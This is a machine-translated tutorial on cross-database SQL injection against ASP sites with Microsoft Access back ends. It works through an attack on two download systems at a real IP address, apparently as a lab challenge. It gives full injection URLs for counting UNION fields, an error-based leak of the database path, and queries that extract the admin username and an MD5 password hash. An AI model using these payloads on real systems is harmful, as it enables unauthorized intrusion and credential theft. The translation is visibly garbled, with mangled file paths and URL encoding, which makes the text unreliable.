You still remember mssql's cross-database query. In fact, cross queries between two data items can be implemented in access. Next I will introduce the cross-database query of access.
First, let's take a look at how to query the mdb File in access. We can create an empty database to query the database D: daosdbdaidalos. the content of the admin table in mdb is queried. The SQL statement is:
SELECT * from admin in "D: daosdbdaidalos. mdb" |
After the query, the system returns the content in the admin table of the target database:
In actual asp injection, two select statements are required at the same time. If you are familiar with php + mysql injection, it is easy to think of union queries, we can still use it in access. Another advantage of using union to query data is not to guess data one by one, the data in the field can be exposed directly like mysql + php injection (the specific mix has already written a detailed article ). It can be seen from the above that cross-database query requires the following two conditions:
- The number of fields in the table in the previous select statement must be known when the union statement is used.
- You must know the location of the target database, absolute path.
Condition 1 can be manually guessed based on the error message, or automatically implemented through the program.
Condition 2 is difficult, but we can use the "access brute-force database" to implement it. Some people will say that since we can know the data location, we will not download it directly, the current number generally prevents downloading, and some are not under the web directory.
The first level of the fourth round of the anti-DDoS pro lab is the two asp + access download systems. One is the rain point Download System and the other is the stolen handsome Download System. After testing, the hacker downloading system can expose the database, but does not allow the download. It seems that there is no injection, and the downloading system in the rain is full of loopholes. The database can be violent and can be directly downloaded, injection is also possible. However, the background of the rain point is very simple and there is nothing to use. Our goal is to get the password of the background of the hacker. I will show it to you, obtain the background password of the hacker through cross-database query by the injection points of the rain point system:
We know that the list. asp of the rain point system can be injected. We first need to get the number of data table fields in the union, and submit:
Http: // 219.237.81.46/yddown/list. asp? Id = 75% 20 union % 20 select % 201% 20 from % 20 userinfo |
Return Value:
Microsoft JET Database Engine error 80040e14 The two data tables selected in the joint query or the columns in the query do not match. /Yddown/list. asp, row 51 |
The field is incorrect. I wrote a perl script to automatically guess the field (see the code below)
When we submit:
Http: // 219.237.81.46/yddown/list. asp? Id = 75% 20 union % 20 select % 3%, 20 from % 20 userinfo |
No error returned:
Haha! We have obtained the number of fields, and we can get the data that we query at the position of Field 1.
Now we are still at the database location where the hacker is handsome. Let's simply submit the following:
Http: // 219.237.81.46/dsdown % 5cregs. asp |
Successful return path:
Microsoft JET Database Engine error 80004005 D: 111dbkljdsld. asa is not a valid path. Check whether the path name is correctly spelled and whether it is connected to the server where the file is stored. /Dsdown/db/user. asp, Row 6 |
(Note: The obtained path is not necessarily "complete". The actual path is D: 111dsdowndbkljdsld. asa)
Next we construct a url across databases as follows:
Http: // 219.237.81.46/yddown/list. asp? Id = 75% 20 union % 20 select % 20 admin, 3,2% 20 from % 20 admin % 20in % 20 "D: 111dsdowndbkljdsld. asa" % 20 where % 20id = 1 |
The preceding statement is to query the admin data of the id = 1 field in the admin table in the union query data D: 111dbkljdsld. asa. If the result is successful, the user name managed in the background is exposed:
The username is admin, and then the brute-force password is obtained:
Http: // 219.237.81.46/yddown/list. asp? Id = 75% 20 union % 20 select % 20pws, 3,2% 20 from % 20 admin % 20in % 20 "D: 111dsdowndbkljdsld. asa" % 20 where % 20id = 1 |
We can get a 32-bit md5-encrypted hash: 77e6cbb3f9468eadb655ae6826357922. The cross-database query is successful. Here I just want to demonstrate the cross-database query, and the anti-DDOS service does not work here :).
Summary
This article mainly introduces two very useful methods. 1st we don't have to guess each character at the top of asp injection, so it is very troublesome to have Chinese characters, directly Using union instead of data can directly expose the data, regardless of whether it is a Chinese character or a special character, can be put in place in one step, 2nd is a cross-database, the use is very flexible, can let you during penetration, there are unexpected gains.